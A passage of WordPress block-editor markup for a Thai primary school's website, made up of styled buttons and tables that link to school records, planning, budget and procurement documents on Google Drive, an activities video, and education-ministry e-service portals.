900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a 